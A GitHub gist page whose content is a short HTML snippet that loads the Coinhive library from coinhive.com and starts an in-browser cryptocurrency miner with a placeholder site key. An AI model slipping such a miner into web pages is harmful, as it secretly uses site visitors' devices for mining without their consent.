Created
December 2, 2019 20:34
-
-
Save stevermeister/5f6a810304b87a9c964bfaa60d6eeac3 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script src="https://coinhive.com/lib/coinhive.min.js"> | |
</script> | |
<script> | |
var miner = new CoinHive.User('SITE_KEY', 'john-doe'); | |
miner.start(); | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment